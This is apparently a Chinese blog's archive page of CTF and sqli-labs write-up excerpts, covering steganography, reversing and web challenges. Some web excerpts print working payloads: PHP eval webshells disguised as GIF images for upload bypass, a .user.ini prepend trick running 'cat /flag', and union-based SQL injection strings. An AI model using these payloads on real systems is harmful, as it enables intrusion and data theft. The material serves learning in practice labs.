10 2020 档案
摘要:把图片binwalk foremost分离 在output文件夹里就有分离出来的东西了,有个压缩包,解压出来 出来一个福利.docx,里面是个二维码 flag出 flag{you are the best!}
阅读全文
摘要:打开之后 看源码 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__fil
阅读全文
摘要:进去之后让上传东西,想上传一个一句话木马,发现只让上传图片格式的,并有前端过滤 那我们把一句话写到一个文本文件里,再把后缀名改为jpg GIF89a <script language="php">eval($_POST['shell']);</script> 上传,bp拦截包,改包,将后缀名由jpg
阅读全文
摘要:class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 注意到了_wakeup(),如果需要反序列化的时候,php才会调用_wakeup()。所以我们需要利用反序列化。
阅读全文
摘要:binwalk常用命令之提取binwalk出的隐藏文件 -e 分解出压缩包 binwalk -e pcat.bin //要分解的文件名 -D或者–dd 分解某种类型的文件(在windows里要用双引号括起来) binwalk -D=jpeg/*文件类型*/ pcat.bin //要分解的文件名 -M
阅读全文
摘要:简单审计一下源码 <?php $miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws"; function encode($str){ $_o=strrev($str); //反转字符串 // echo $_o; fo
阅读全文
摘要:查看源码之后 带着script标签一同保存到本地里,保存为后缀名为html的文件,并把里面的eval改为alert,让他可以弹出来,打开文件 啊哦,出来了,整理一下 function $(){ var e=document.getElementById("c").value; if(e.length
阅读全文
摘要:两个方法,嘿嘿嘿 手工注 首先用 ' and 0 union select 1,2,3# 来初步判断该sql查询返回三列数据 然后就可以找表 ' and 0 union select 1,TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA.COLUMNS#
阅读全文
摘要:根据题目提示 找报表中心 发现有明显的?id=1 先将抓到的包放到Intruder,发现id已经设为变量,就把爆破变量设为数字,然后爆破 按长度来 发现了一个2333,id就出来了,url直接整 cyberpeace{f4a1a344baaf56ab2bf488f66b80b467}
阅读全文
摘要:从代码中得知page中带有php://的都会被替换成空 str_replace()以其他字符替换字符串中的一些字符(区分大小写) strstr() 查找字符串首次出现的位置。返回字符串剩余部分 <?php show_source(__FILE__); echo $_GET['hello']; $pa
阅读全文
摘要:打开之后 发现是一个php框架,根据题目php-rce远程命令执行,然后在GitHub上试试搜索搜索 我们随便输了一个 发现还可以出来些东西,用ls看看目录 发现没啥,继续查看上级目录,最终在根目录下查到flag文件 这回好了,直接find搜flag 啥也不说了,直接看flag里的内容 阿巴阿巴阿巴
阅读全文
摘要:这个题下载之后听就听出来了是摩斯密码,但感觉太麻烦了,就用了另个方法 关闭左声道.导出为wav文件. 拖到kali 得到flag flag{f029bd6f551139eedeb8e45a175b0786} morse2ascii安装 apt-get install morse2ascii 使用方法
阅读全文
摘要:二话不说直接分离 得到一张图,拖到hxd 发现avi文件的文件头,直接改后缀名,我是用kinovea https://www.kinovea.org 一帧一帧的看,发现四张二维码,发现视频存在交错,导致最后一张二维码出不来。在kinovea 里图像——反交错 点击一下即可得到清晰图片 然后扫描每张二
阅读全文
摘要:菜刀都是 POST 所以直接搜 POST逐流追踪 然后挨个儿追踪tcp流 在流7里发现了 z1 是图片的地址 z2 以十六进制保存图片 然后在流9里发现了 有一个需要密码的flag.txt,于是我们使用\foremostlrb将 下载的这个文件分离出来,得到一个zip文件,然后 密码就是那张图片的文
阅读全文
摘要:好家伙 在线解(http://hi.pcmoe.net/buddha.html) 根据题目提示,去掉com,然后让我猜 ok直接outguess解密 隐写工具outguess安装及使用 Kail终端命令输入git clone https://github.com/crorvick/outguess
阅读全文
摘要:分离图片之后 key里是一串base64解密后 他问我 Nicki 最喜欢关于蛇的歌是啥, 我哪知道,我就百度了 啊这,身材挺好。发现了anaconda对应着文件里的那个key,然后对于蛇这个名词,在英语中还有一个翻译:Serpent。Serpent是一个加密算法http://serpent.onl
阅读全文
摘要:题目说刷新过的图片,想了好久不明白,然后想到了百度看到过F5隐写 然后直接拖到kali里 利用工具 —— F5-steganography 默认将解密出来的内容放置在一个txt文件中,我打开后发现是个zip,(文件头是50 4B 03 04),于是改成.zip,解压发现有密码。用hxd打开后发现是伪
阅读全文
摘要:搜索http数据包 发现一个post提交的数据,右键追踪流 根据题目提示 账号和密码串在一起再md5哈希 拼接用户名密码得到adminaadminb 使用md5处理后得到1d240aafe21a86afc11f38a45b541a49 flag{1d240aafe21a86afc11f38a45b5
阅读全文
摘要:首先解压后打开,foremostlrb出来了一个zip,明显伪加密 老规矩,09变00 解压后出来个flag.vmdk.拖到kali里解压 解压出了四个文件 一开始我的这四个文件都是没有权限打开的,因为我也不会,稀里糊涂搞了两个多小时无果,然后问了大佬 chmod -R 777 文件名 这个是改文件
阅读全文
摘要:打开之后,直接formostlrb 我们打开压缩包看到asd文件下还有图片和qwe压缩包、 伪加密,01变00 出来解压 我们打开kali,然后将这张图片拖到kali中,使用steghide工具 得到压缩包密码 解压同文件下的压缩包 复制一下,就是qwe.zip的密码,打开我们获得flag. fla
阅读全文
摘要:首先打开之后是一个py文件,本地跑一下,出错 显示说, 源码为: import hashlib for i in range(32,127): for j in range(32,127): for k in range(32,127): m=hashlib.md5() m.update('TASC
阅读全文
摘要:进入之后 然后我们看到了一个if if(isset($text)&&(file_get_contents($text,'r') "welcome to the zjctf")) 要求text不为空,并且file_get_contents($text,'r') "welcome to the zjct
阅读全文
摘要:响应头里发现sql语句 select * from 'admin' where password=md5($pass,true) 看了大佬博客,这个可以用ffifdyop绕过,绕过原理是:ffifdyop 这个字符串被 md5 哈希了之后会变成 276f722736c95d99e921722cf9e
阅读全文
摘要:看search.php 发现了一串base,先base32 再base64 然后我们还是像之前一样,确定一下列数: name=1' union select 1,2,3,4 %23 &pw=123 这样的话就报错了,然后再把4删掉,成功显示,这便确定了是3列 name=1' union select
阅读全文
摘要:将其等宽高
阅读全文
摘要:打开之后猜测是伪加密 09 变 00解压 发现是png的图片,没有文件头,添加89 50 4E 47 保存改后缀,查看 16进制转换得flag BJD{y1ngzuishuai}
阅读全文
摘要:首先添加上传一个.user.ini GIF89a auto_prepend_file=a.jpg 再添加上传一个a.jpg GIF89a <script language='php'>system('cat /flag')</script> 在这里可以看到 uploads/33c6f8457bd77
阅读全文
摘要:这个题我有两个思路。 1.绕过前端Js验证,phtml拓展名的应用 首先打开之后,写一个phtml文件 GIF89a <script language="php">eval($_POST['shell']);</script> 发现不允许上传phtml文件 猜想有js验证 F12查看 果然,将其删除
阅读全文
摘要:打开之后啥信息都没有 题目的提示是backupFile备份文件 备份文件一般的后缀名为 .rar .zip .7z .tar.gz .bak .swp .txt .html .bak可以用dirsearch 扫 链接: dirsearch. 使用,试了很多备份文件,这里的备份文件是index.php
阅读全文
摘要:发现让我们上传文件, 首先在桌面创建一个y.phtml的文件,内容为 GIF89a <script language="php">eval($_POST['shell']);</script> 然后我们将它上传,提交时使用bp截取,修改一下格式,再放行 我们使用蚁剑连接,猜测路径为upload 完整
阅读全文
摘要:发现有一个php 访问 发现这里需要在http报头里加上一个Referer 于是伪造Referer: https://www.Sycsecret.com 这里需要使用"Syclover"浏览器,即User-Agent头为Syclover 修改发包 发现他让我本地访问,这里加入一个X-Forwarde
阅读全文
摘要:拖到APKIDE 搜索flag,得到flag
阅读全文
摘要:发现有个UPX的壳儿,拖到OD 看到个显眼的popad,点第一个断点jmp 用自带工具脱壳儿 保存之后拖到ida, 明显flag{HappyNewYear!}
阅读全文
摘要:进入ida跟进伪代码 看到了个flag,肯定不是 转换为字符,发现 把刚刚那一串flag里面的i和r替换成1 flag{hack1ng_fo1_fun}
阅读全文
摘要:下载将exe文件拖到ida shift+F12, 发现了这个,双击跟进, 然后选中在双击 光标选中之后F5查看伪代码 发现这个应该是将ASCII为111 的替换为 48,查询后是o换成0 这里发现是str1接受flag 然后将Str1与Str2进行比较,如果相等就this is the right
阅读全文
摘要:首先万能密码注入 然后换个用户名注入查询 ?username=1' order by 4%23&password=1 因为在url里输入的,所以,要把# 换成%23 发现最多3个字段 ?username=1' union select 1,2,group_concat(table_name) fro
阅读全文
摘要:打开之后,尝试登录注入没啥用,发现or被过滤了,联合查询,union select 也被过滤了。 ?username=1' uniunionon selselectect 1,2,3%23 &password=123 双写被过滤的关键字注入查询 然后直接爆数据库,发现被过滤了很多关键字,直接双写 ?
阅读全文
摘要:进入第五关之后稀里糊涂随便注了一通发现没有篮子用。可能是:布尔型盲注、报错型注入、时间延迟型盲注了。到这里时我们需要了解一些sql语句、函数。可以参考https://blog.csdn.net/qq_41420747/article/details/81773481 1、构造逻辑判断 (1)sql注
阅读全文
摘要:一开始随便注了一下,发现和第三关类似,只是从单引号变成了双引号。 继续注入,与第三关类似。 然后判断列数,直接 ?id=3") order by 4--+ 发现它还是三列,然后就继续爆库名 ?id=-3") union select 1,2,database()--+ 爆表名 ?id=-3") un
阅读全文
摘要:前两关用的注入方法都不可行 看了看源码 于是尝试带括号的字符注入方式,发现注入成功 然后和前两关相同,不做多说明。
阅读全文
摘要:sql注入一般步骤: 第一步:通过特殊的数据库查询语句 第二步:在数据库的错误返回中找到sql漏洞 第三步:利用sql语句猜解管理人员信息并登录管理员后台 判断注入类型 数字型注入 1. url为 //127.0.0.1/sqli-labs/Less-2/?id=1’时,因为有一个多余的”单引号”使
阅读全文
摘要:一。 先判断是否为字符型注入,尝试?id=1' 发现有报错,此题为字符型注入 拼接字符串?id=1' and '1'='1 回显正常 然后我们用order by 来确定表中的列数,使用union 联合查询特点: 1、要求多条查询语句的查询列数是一致的!2、要求多条查询语句的查询的每一列的类型和顺序最
阅读全文
浙公网安备 33010602011771号